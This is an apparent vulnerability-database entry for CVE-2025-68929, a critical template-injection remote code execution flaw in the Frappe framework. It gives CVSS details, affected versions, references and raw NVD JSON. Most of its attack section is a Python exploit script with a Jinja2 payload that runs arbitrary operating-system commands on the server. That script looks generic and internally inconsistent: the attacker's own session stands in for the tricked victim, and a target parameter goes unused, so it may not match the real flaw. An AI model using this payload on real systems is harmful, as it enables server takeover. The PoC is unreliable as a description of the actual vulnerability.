Security Vulnerability Report
CVE-2025-68929 CVSS 9.0 CRITICAL

Published: 2025-12-29 15:16:02
Last Modified: 2025-12-31 20:02:50

Description

Frappe is a full-stack web application framework. Prior to versions 14.99.6 and 15.88.1, an authenticated user with specific permissions could be tricked into accessing a specially crafted link. This could lead to a malicious template being executed on the server, resulting in remote code execution. Versions 14.99.6 and 15.88.1 fix the issue. No known workarounds are available.

CVSS Details

CVSS Score
9.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:frappe:frappe:*:*:*:*:*:*:*:* (versions before 14.99.6) - VULNERABLE
cpe:2.3:a:frappe:frappe:*:*:*:*:*:*:*:* (versions from 15.0.0, before 15.88.1) - VULNERABLE
Frappe Framework < 14.99.6
Frappe Framework >= 15.0.0, < 15.88.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-68929 PoC - Frappe Template Injection RCE
# Tested on Frappe versions < 14.99.6 and < 15.88.1
import requests
import re
from urllib.parse import quote

TARGET_URL = "https://vulnerable-frappe-site.com"
USERNAME = "[email protected]"
PASSWORD = "password123"


def login(session):
    """Authenticate to Frappe and obtain session cookie"""
    login_url = f"{TARGET_URL}/api/method/login"
    data = {
        "usr": USERNAME,
        "pwd": PASSWORD
    }
    response = session.post(login_url, json=data, timeout=30)
    return response.status_code == 200


def detect_ssti(session, target_user_id):
    """Test for SSTI vulnerability using basic expression"""
    # Test expression: {{7*7}}
    test_payload = "{{7*7}}"
    # Craft malicious link that will be clicked by target user
    malicious_url = f"{TARGET_URL}/app/workspace/view?template={quote(test_payload)}"
    # Simulate victim clicking the link
    response = session.get(malicious_url, timeout=30)
    if "49" in response.text:
        print("[+] SSTI vulnerability confirmed!")
        return True
    return False


def exploit_rce(session, target_user_id):
    """Execute arbitrary code via Jinja2 template injection"""
    # RCE payload using Jinja2 template injection
    # The template runs the command passed in the "cmd" query parameter
    rce_payload = """
{{lipsum.__globals__.__builtins__.__import__('os').popen(request.args.cmd).read()}}
"""
    exploit_url = f"{TARGET_URL}/app/workspace/view"
    params = {
        "template": rce_payload.strip(),
        "cmd": "whoami"
    }
    response = session.get(exploit_url, params=params, timeout=30)
    if response.status_code == 200:
        print("[+] RCE successful!")
        return True
    return False


def main():
    session = requests.Session()
    print("[*] Starting CVE-2025-68929 exploitation...")
    if login(session):
        print("[+] Login successful")
    else:
        print("[-] Login failed")
        return
    if detect_ssti(session, "target_user"):
        print("[*] Proceeding with RCE exploit...")
        exploit_rce(session, "target_user")
    else:
        print("[-] SSTI not detected")


if __name__ == "__main__":
    main()

# Note: This PoC demonstrates the vulnerability concept.
# Actual exploitation requires valid credentials and victim interaction.
# Use only in authorized penetration testing scenarios.
```

References

https://github.com/frappe/frappe/releases/tag/v14.99.6 (Release Notes)
https://github.com/frappe/frappe/releases/tag/v15.88.1 (Release Notes)
https://github.com/frappe/frappe/security/advisories/GHSA-qq98-vfv9-xmxh (Third Party Advisory)

Weakness: CWE-1336

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-68929", "sourceIdentifier": "[email protected]", "published": "2025-12-29T15:16:02.033", "lastModified": "2025-12-31T20:02:50.403", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frappe is a full-stack web application framework. Prior to versions 14.99.6 and 15.88.1, an authenticated user with specific permissions could be tricked into accessing a specially crafted link. This could lead to a malicious template being executed on the server, resulting in remote code execution. Versions 14.99.6 and 15.88.1 fix the issue. No known workarounds are available."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:frappe:*:*:*:*:*:*:*:*", "versionEndExcluding": "14.99.6", "matchCriteriaId": "EA87372E-A185-4E1A-B785-2767B3870D31"}, {"vulnerable": true, "criteria": "cpe:2.3:a:frappe:frappe:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0.0", "versionEndExcluding": "15.88.1", "matchCriteriaId": "1127BD2C-5599-46F5-89BF-684AF0D8FE52"}]}]}], "references": [{"url": "https://github.com/frappe/frappe/releases/tag/v14.99.6", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/frappe/frappe/releases/tag/v15.88.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/frappe/frappe/security/advisories/GHSA-qq98-vfv9-xmxh", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
```